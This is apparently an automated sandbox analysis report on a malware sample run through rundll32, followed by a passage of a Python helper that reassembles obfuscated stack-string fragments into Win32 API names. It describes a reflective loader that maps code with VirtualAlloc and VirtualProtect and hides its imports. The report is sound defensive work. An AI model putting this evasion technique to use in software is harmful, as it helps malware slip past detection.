                                                                    • Opcode Fuzzy Hash: d8792019bb8cd892c5e2cff0ba87425d7977148afb5a5f987cda1e45d5ff9126
                                                                    • Instruction Fuzzy Hash: C102E3B151038CDBCB99DF28C8CAADD3BA1FB48398F956219FD0697260D774D884CB85
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.355889748.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: )|x$/Zb$/v|$OV4T$\$lA
                                                                    • API String ID: 0-3528011396
                                                                    • Opcode ID: 74ea3d61a93069fa3a56a5f8f60d4b0c7eeb5b014d6ac06c6862fd203c8e6463
                                                                    • Instruction ID: 5dbdb21e6b24644f90705741d0e2e2cc24c858ca1caac6c8284349b4f9dc1789
                                                                    • Opcode Fuzzy Hash: 74ea3d61a93069fa3a56a5f8f60d4b0c7eeb5b014d6ac06c6862fd203c8e6463
                                                                    • Instruction Fuzzy Hash: 8C2204705097C8CBDBBECF64C885BDA7BA8FB44B08F10521DEA4A9E258DB745744CB41
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.355889748.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $&.+$)O$.pN$F>9$t(/
                                                                    • API String ID: 0-3036092626
                                                                    • Opcode ID: 549a8b626face2190b4149bba4d09d4cb88f6d29378e8937dde350adb7fd5a83
                                                                    • Instruction ID: e4baced68933c0a0796cf32b330105f1a6d3ed4de4784e8c7f389f9334031704
                                                                    • Opcode Fuzzy Hash: 549a8b626face2190b4149bba4d09d4cb88f6d29378e8937dde350adb7fd5a83
                                                                    • Instruction Fuzzy Hash: E6E109716093C89FEBBACF24C8897DE7BA1FB59344F50421DD88A8E250DB745B49CB42
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.355889748.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: +#;)$K'$sf$w\H
                                                                    • API String ID: 0-1051058546
                                                                    • Opcode ID: 6c53062de77b202a7a918e5f4038520a98252693d28bf41343123917f80ba32c
                                                                    • Instruction ID: 30c6111824d62709d88844cae5ccd518ea343406d57bec7882368cdc1c6a6611
                                                                    • Opcode Fuzzy Hash: 6c53062de77b202a7a918e5f4038520a98252693d28bf41343123917f80ba32c
                                                                    • Instruction Fuzzy Hash: 8362F97050068D8FDB48DF28C89A6DD3FA1FB58388F524229FC4AA7251D778D999CBC4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.355889748.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: <4P$<8$<w.
                                                                    • API String ID: 0-1030867500
                                                                    • Opcode ID: 6c4ff939f0d35883aefbb319d4430fd67387b4e339adb0f797cabce8c6a4bf31
                                                                    • Instruction ID: 97d266913d6b0fd63d839b3c54903fd41a2ccd22a8a26fffcb9587bfe3b6431f
                                                                    • Opcode Fuzzy Hash: 6c4ff939f0d35883aefbb319d4430fd67387b4e339adb0f797cabce8c6a4bf31
                                                                    • Instruction Fuzzy Hash: C8B1E17151A384ABD788CF28C1C994BBBE1FBD4754F906A1DF8C68B260D7B0D948CB02
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.355889748.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 9400724a362ecc304d993d2fe4c896d101fab294f6d1cf34a07a96bc2a8ce181
                                                                    • Instruction ID: 281782cf28aa09d34d334260f991d1b96cfbd8271b51b9b7c31761fd0664cb75
                                                                    • Opcode Fuzzy Hash: 9400724a362ecc304d993d2fe4c896d101fab294f6d1cf34a07a96bc2a8ce181
                                                                    • Instruction Fuzzy Hash: 4B51EC715087889BCBB8DF18C9856CA7BF0FF95704F50891DE9898B250DF719A44DB42
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.355889748.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: "+H$1l7.$M8;$]$d$]k$]k$94
                                                                    • API String ID: 0-2447245168
                                                                    • Opcode ID: 3fd6bef9004380659c47559ba6e3d81fe5eea7f701e849f333ef0deba45e7d13
                                                                    • Instruction ID: 1221e244f5383d3e6569bf50eb566ee92e7d288cf12f4405919b94e37960c7a7
                                                                    • Opcode Fuzzy Hash: 3fd6bef9004380659c47559ba6e3d81fe5eea7f701e849f333ef0deba45e7d13
                                                                    • Instruction Fuzzy Hash: 3FB10D7160130CCBDBA9DF28C18A6DA3BE1FF48748F114129FD1A97261D774E919CB46
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.355889748.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: -!zt$Mv`b$R3T$d}9J$t:v$ru
                                                                    • API String ID: 0-2100131636
                                                                    • Opcode ID: e0551372703c1c57f1fc0d9d1de0f1be02ef62f192bed394747547d409ac2d0a
                                                                    • Instruction ID: abddbd47ac15f5a8ffacaf8e31a06efd054a3dbd2afb1a66e8bbaa14beb483a4
                                                                    • Opcode Fuzzy Hash: e0551372703c1c57f1fc0d9d1de0f1be02ef62f192bed394747547d409ac2d0a
                                                                    • Instruction Fuzzy Hash: C1221BB050478C8BDBB8CF64C9897DD7BB0FB44308F10862DDA5AAB250CBB45686CF59
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.355889748.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $$"`2$lbzZ$lmq$tro$kO
                                                                    • API String ID: 0-2401169580
                                                                    • Opcode ID: b22a75222821f6640e36d1476563fd6974371582067e8c17588d676730c46316
                                                                    • Instruction ID: 279b0f6eedbbacd77816cba7ac57bf6919de5fbe0bc464da326619847ce4fcd1
                                                                    • Opcode Fuzzy Hash: b22a75222821f6640e36d1476563fd6974371582067e8c17588d676730c46316
                                                                    • Instruction Fuzzy Hash: BBF1C3709047488FDBA8DFA8D9867DDBBB1FB48304F20821DD84AEB255DB749A49CF41
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.355889748.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: )#?$EX.$PT$UbA$2f
                                                                    • API String ID: 0-1318892062
                                                                    • Opcode ID: f9a85fa51538b1a6c0e22373df85dddbbc427f24166f886711afb0f01761c199
                                                                    • Instruction ID: a9b5704be98d3dd027f678fe08c59eda011257bdda9cf4ed25ea0f7660729633
                                                                    • Opcode Fuzzy Hash: f9a85fa51538b1a6c0e22373df85dddbbc427f24166f886711afb0f01761c199
                                                                    • Instruction Fuzzy Hash: 8B320DB190078C8BDBB8CF64C8856DD7BF0FB48318F50852DEA1A9B251DBB45685CF98
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.355889748.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $T$?F$QP|m$qjf$tZp
                                                                    • API String ID: 0-3477398917
                                                                    • Opcode ID: a2afc25ca6c2e6ca488c7a804df3743aa45b21aa43371557c2da8ddda12b60f7
                                                                    • Instruction ID: e54beaa769b94aae3cb673a52a2b60ade73482c6e5d3d936cdc9b6ae13d51efd
                                                                    • Opcode Fuzzy Hash: a2afc25ca6c2e6ca488c7a804df3743aa45b21aa43371557c2da8ddda12b60f7
                                                                    • Instruction Fuzzy Hash: 0B122870A0470CDFCF69DFA8C08A6DDBBF2FB44344F1091A9E816AB261D7759A19CB41
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.355889748.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: JQ$k&($t$v$x\J
                                                                    • API String ID: 0-1134872184
                                                                    • Opcode ID: e2b118cac14b957c819117e18deb076f69f9d4e25580e92a2151fd03385e5a66
                                                                    • Instruction ID: 7c1fd17b310acde7e359d6be57bcfb6c2dd011f2caef592e77d3cba241376f6b
                                                                    • Opcode Fuzzy Hash: e2b118cac14b957c819117e18deb076f69f9d4e25580e92a2151fd03385e5a66
                                                                    • Instruction Fuzzy Hash: F312E0B0504709EFCB99DF28C18AADE7BF0FB48308F40812AF80A9B254D774DA58DB45
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.355889748.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: R$)H8$?rIc$L==$V
                                                                    • API String ID: 0-2512384441
                                                                    • Opcode ID: 0d280c2f9ee604a9d8763362a2e2c249d7a205bc5c068130deea404b5e8e02a7
                                                                    • Instruction ID: 6f6f9af97a41f07aad9f9d1cbd67af5334817a93c453241fb2a5d498ae2065c2
                                                                    • Opcode Fuzzy Hash: 0d280c2f9ee604a9d8763362a2e2c249d7a205bc5c068130deea404b5e8e02a7
                                                                    • Instruction Fuzzy Hash: 3541D0B090074E8BCF48CF64D49A5DE7FB0FB68398F20421DE856A6250D3B896A5CFC5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.355889748.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: Qq$bt$vird$+$S
                                                                    • API String ID: 0-3373980505
                                                                    • Opcode ID: 46bb33aa035ecbbdf74cf68df8db4d7c020810c30b71dbb4fbdebc27907f7b4b
                                                                    • Instruction ID: 8c34661c01ca41a1498f33dadfb9b2381b3c020394efcb6cfebc1cbd8490f91c
                                                                    • Opcode Fuzzy Hash: 46bb33aa035ecbbdf74cf68df8db4d7c020810c30b71dbb4fbdebc27907f7b4b
                                                                    • Instruction Fuzzy Hash: 8831C2B081038A8FDB45CF64C88A5DE7BF0FB58358F115A19F869A6250D3B4D668CF81
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.355889748.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: V$@$P9$^_"
                                                                    • API String ID: 0-1880944046
                                                                    • Opcode ID: 14fe4b6354f8c882e246ec0bcf45ce0c6e4a33b057813c2d4cef38f5cb1d7b15
                                                                    • Instruction ID: ef3f81825b514374c5d287d432cdf068934c0dc0259921085eace1de493a05f6
                                                                    • Opcode Fuzzy Hash: 14fe4b6354f8c882e246ec0bcf45ce0c6e4a33b057813c2d4cef38f5cb1d7b15
                                                                    • Instruction Fuzzy Hash: B6F1DF70504749EFCB98CF28D18AACE7BE0FB48348F50812AF81A9B264D770DA59DB45
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.355889748.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: =_$F)k$b/$syG
                                                                    • API String ID: 0-3955183656
                                                                    • Opcode ID: a0c8fbb251499c36d1c33fbfac3bbb926034851086b3556ae4bae43476727e6a
                                                                    • Instruction ID: 3a63fdd7148b145f5d2717dabea2a2fa508061acbcc25a132c341bfe6e9ad30f
                                                                    • Opcode Fuzzy Hash: a0c8fbb251499c36d1c33fbfac3bbb926034851086b3556ae4bae43476727e6a
                                                                    • Instruction Fuzzy Hash: DED12771A0478D8BCF59DFA8C88A6EEBBB0FB48344F10421DE846A7650D7B4D909CF85
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.355889748.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: #X$'Xsa$iJ6$vG
                                                                    • API String ID: 0-746338152
                                                                    • Opcode ID: 05ea12fd72043b3df7b90193803f13f9b9661e31632ee757fcd333ad07ef3f6f
                                                                    • Instruction ID: 8ba50615c78112980223cca8f04f1fa67c4b69ee5a809e4e0bd2b8ae6832a1bb
                                                                    • Opcode Fuzzy Hash: 05ea12fd72043b3df7b90193803f13f9b9661e31632ee757fcd333ad07ef3f6f
                                                                    • Instruction Fuzzy Hash: 93E154B590070DDFCB88DF68D19A9DD7BB9BB49308F404029FC0E9A264D3B4E919CB56
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.355889748.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: *i^$MIC$-Z$]2
                                                                    • API String ID: 0-498664264
                                                                    • Opcode ID: db11ef6343568e39e87295be28a4fb69218d9fc865c563580501f4fd78a225ea
                                                                    • Instruction ID: 9792ecb135b2155067e966d5e38dbf4f409fde80c29e70d57d2078ebe1ce15c6
                                                                    • Opcode Fuzzy Hash: db11ef6343568e39e87295be28a4fb69218d9fc865c563580501f4fd78a225ea
                                                                    • Instruction Fuzzy Hash: 10E1C670109B888FDBF8DF64CC86BEB7BA5FB44346F10651DD84A8A290DBB46645CF41
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.355889748.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: B$EG$QsF$_
                                                                    • API String ID: 0-784369960
                                                                    • Opcode ID: 2411b4f18f6ae95c167793a9182b69dfaeb4b2ef39c1ac24af76ef798b153418
                                                                    • Instruction ID: 62dbbc71664ee0946fffbba3b71afe09b12d9ffe0d1744d6deb9db65ff0cd9cc
                                                                    • Opcode Fuzzy Hash: 2411b4f18f6ae95c167793a9182b69dfaeb4b2ef39c1ac24af76ef798b153418
                                                                    • Instruction Fuzzy Hash: 3FB1387010468D8FDF88DF28C88A6DA3FA1FB68388F614219FC4A97250C778D694CBC5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.355889748.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: -`G$.$5B.Y$Z`35
                                                                    • API String ID: 0-1363032466
                                                                    • Opcode ID: bf60aa8e83620137796280cd5bd0e9d08ed9dd04dd302297e234b85e3718d0fd
                                                                    • Instruction ID: b244d414363a4385de25ad5610b22aaac7fb2f2c92cf8150697ad32e565f4bd8
                                                                    • Opcode Fuzzy Hash: bf60aa8e83620137796280cd5bd0e9d08ed9dd04dd302297e234b85e3718d0fd
                                                                    • Instruction Fuzzy Hash: 29A1FB716157888FEB7ADF24C89A7CE7BE1FB49308F40461DD98E8A250D7B49609CB42
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.355889748.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: *+_$WSh$\O$#o
                                                                    • API String ID: 0-1846314129
                                                                    • Opcode ID: 2b55738af9202b4623c877c52658b874745984570bac3296ae94d1111b904a17
                                                                    • Instruction ID: 175ce4bc0e22c7a636d32034be2bbb8ad42f6b3cb6a748f64f507b7f0b29ed37
                                                                    • Opcode Fuzzy Hash: 2b55738af9202b4623c877c52658b874745984570bac3296ae94d1111b904a17
                                                                    • Instruction Fuzzy Hash: 1971167160474ECFCB98DF18C489ADA3BE1FB58318F414529FC09A7264DB74DAA8CB85
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.355889748.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: .B$O$M*K$\<
                                                                    • API String ID: 0-3225238681
                                                                    • Opcode ID: 97d1f14c936b4c6fd28126f9270f10017570076f2259e30e0790da2a5d8d89f7
                                                                    • Instruction ID: 95d2fbb8f7fe970b1359d27f41ccd6aad584115d4fee043204e0c0f4c3f3b287
                                                                    • Opcode Fuzzy Hash: 97d1f14c936b4c6fd28126f9270f10017570076f2259e30e0790da2a5d8d89f7
                                                                    • Instruction Fuzzy Hash: 7181E370549788CFEBBACF24C886BDE7BE4FB48744F20461DE85A8A260DB709645CF41
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.355889748.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $$$$xVO$~O
                                                                    • API String ID: 0-3655128719
                                                                    • Opcode ID: f0a1fe130e7a88269555c94ae3afa6992adf671055acde803b367a0cf8dc4998
                                                                    • Instruction ID: 8f78542db34460f4381821bab2b7e4f68a699ed7f8b2fc47c959991f0b02677a
                                                                    • Opcode Fuzzy Hash: f0a1fe130e7a88269555c94ae3afa6992adf671055acde803b367a0cf8dc4998
                                                                    • Instruction Fuzzy Hash: 5B61D1B05187448FD369DF28C18965BBBF1FBC6744F008A1EF6868A260DB76D948CB47
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.355889748.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: ,IW$G$JMg$l
                                                                    • API String ID: 0-1370644289
                                                                    • Opcode ID: aa199bcfabd2ca119bc867395ae2bb0b970833e8ef3f83c28db76f19b2a25dac
                                                                    • Instruction ID: 7fb8b97fd43ed4dc52a467cdcf5cca41e6e56dbc92574a5c866222c6b731b82a
                                                                    • Opcode Fuzzy Hash: aa199bcfabd2ca119bc867395ae2bb0b970833e8ef3f83c28db76f19b2a25dac
                                                                    • Instruction Fuzzy Hash: 0A41D3B190074E8FCB48CF64C88A5DE7FB0FB18358F10461EE85AA6250D7B89695CFC9
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.355889748.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: ,$,$2S=$i`}G
                                                                    • API String ID: 0-4285990414
                                                                    • Opcode ID: 1704a5678c6fc7c63ed33a4399dbb19a0648d0f8b4dca33206a3e55e43de3fb6
                                                                    • Instruction ID: 665cb0e6160ce90faac3fa7baf9a16caae401c848b442bb7533a8cc1fd62885f
                                                                    • Opcode Fuzzy Hash: 1704a5678c6fc7c63ed33a4399dbb19a0648d0f8b4dca33206a3e55e43de3fb6
                                                                    • Instruction Fuzzy Hash: 4D41E57051CB848FD7B4DF18D486BDABBE0FB98750F40495EE48DC3251DBB0A8858B86
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Execution Graph

                                                                    Execution Coverage:10.7%
                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                    Signature Coverage:0%
                                                                    Total number of Nodes:11
                                                                    Total number of Limit Nodes:0
execution_graph (rendered graph omitted; nodes and edges as listed in the report):
3264 1a5a5e90000 -> 3265 1a5a5e90183 -> 3266 1a5a5e9043e VirtualAlloc -> 3270 1a5a5e90462
3270 -> 3267 1a5a5e90a7b (exit); 3270 -> 3268 1a5a5e90531 GetNativeSystemInfo
3268 -> 3267; 3268 -> 3269 1a5a5e9056d VirtualAlloc -> 3274 1a5a5e9058b
3274 -> 3274 (loop); 3274 -> 3273 1a5a5e909d9 VirtualProtect -> 3274; 3274 -> 3271 1a5a5e90a00
3271 -> 3267; 3271 -> 3272 1a5a5e90a56 RtlAddFunctionTable -> 3267

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
control_flow_graph (rendered graph omitted): basic blocks numbered 0 to 144 spanning 1a5a5e90000-1a5a5e90aa6. Block 0 (1a5a5e90000-1a5a5e90460) calls 1a5a5e90aa8 twice and then VirtualAlloc. The API-calling blocks are 35 (1a5a5e90531-1a5a5e90567, GetNativeSystemInfo), 38 (1a5a5e9056d-1a5a5e90589, VirtualAlloc), 129 (1a5a5e909d9-1a5a5e909e9, VirtualProtect) and 116 (1a5a5e90a56-1a5a5e90a79, RtlAddFunctionTable). Block 26 (1a5a5e90a91-1a5a5e90aa6) is the common exit, reached from the early-out checks in blocks 23, 27 to 33 and 35 and from block 100 (1a5a5e90a7b-1a5a5e90a8e).
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.356037217.000001A5A5E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A5A5E90000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_1a5a5e90000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: Virtual$Alloc$FunctionInfoNativeProtectSystemTable
                                                                    • String ID: Cach$Find$Flus$Free$GetN$Libr$Load$Load$Lock$Reso$Reso$Reso$Reso$RtlA$Size$Slee$Virt$Virt$aryA$ativ$ddFu$eSys$hIns$lloc$ncti$ofRe$onTa$rote$sour$temI$tion$truc$ualA$ualP$urce$urce$urce$urce
                                                                    • API String ID: 394283112-2517549848
                                                                    • Opcode ID: 590c178917582490f2a8474f3428d2fdec128c188f960b73743dba758a98ecc8
                                                                    • Instruction ID: a8a076330666a1adf0b3f43f31cfff43b19503f18e706ae827e25901d07d5a69
                                                                    • Opcode Fuzzy Hash: 590c178917582490f2a8474f3428d2fdec128c188f960b73743dba758a98ecc8
                                                                    • Instruction Fuzzy Hash: 1672F230719A48CBDB69DF68C885BF9B7E1FB99304F50426DE88AC3251DB34D542CB86
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

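The String ID line of the block above lists only 4-character fragments, and they reassemble into Win32 API names (VirtualAlloc, GetNativeSystemInfo, RtlAddFunctionTable, the kernel32 resource functions). That is consistent with the loader stage writing import names onto the stack from 32-bit immediates and resolving them at run time instead of through an import table, which is why the report shows no API ID for most of them. The script below is an added worked example, not part of the Joe Sandbox report: it takes the fragments exactly as printed on the String ID line and finds which names from a candidate list can be tiled from them. The candidate list is an assumption of mine (the four APIs the execution graph shows being called, the resource and loader functions a manual PE mapper typically needs, and four decoys); the report itself only shows the fragments. Trailing pieces shorter than four bytes (the "ct" of VirtualProtect, the "p" of Sleep) are allowed to be absent, because a strings pass with a 4-byte minimum would not list them.

```python
from collections import Counter

# Fragments copied from the report's "String ID" line for the memory dump at
# 000001A5A5E90000 (the unpacked loader stage), split on the '$' separator.
REPORT_STRING_ID = (
    "Cach$Find$Flus$Free$GetN$Libr$Load$Load$Lock$Reso$Reso$Reso$Reso$RtlA$"
    "Size$Slee$Virt$Virt$aryA$ativ$ddFu$eSys$hIns$lloc$ncti$ofRe$onTa$rote$"
    "sour$temI$tion$truc$ualA$ualP$urce$urce$urce$urce"
)

# Candidate API names to test. ASSUMPTION: this list is mine, not the report's.
# It holds the four APIs the execution graph shows being called, the kernel32
# resource/loader functions a manual PE mapper usually needs, and four decoys
# (FreeLibrary, VirtualFree, GetProcAddress, CreateThread) that should be rejected.
CANDIDATES = [
    "VirtualAlloc", "VirtualProtect", "GetNativeSystemInfo", "RtlAddFunctionTable",
    "LoadLibraryA", "FindResource", "LoadResource", "LockResource", "FreeResource",
    "SizeofResource", "FlushInstructionCache", "Sleep",
    "FreeLibrary", "VirtualFree", "GetProcAddress", "CreateThread",
]

CHUNK = 4  # one 32-bit immediate carries four ASCII bytes


def fragments_from_report(string_id=REPORT_STRING_ID):
    """Split the report's String ID field into its individual fragments."""
    return string_id.split("$")


def chunks(name):
    """Split an API name into the 4-byte pieces that 32-bit stores would write.
    Returns (full_chunks, tail); tail is the trailing piece shorter than 4 bytes,
    or '' when the name length is a multiple of 4."""
    cut = len(name) - len(name) % CHUNK
    full = [name[i:i + CHUNK] for i in range(0, cut, CHUNK)]
    return full, name[cut:]


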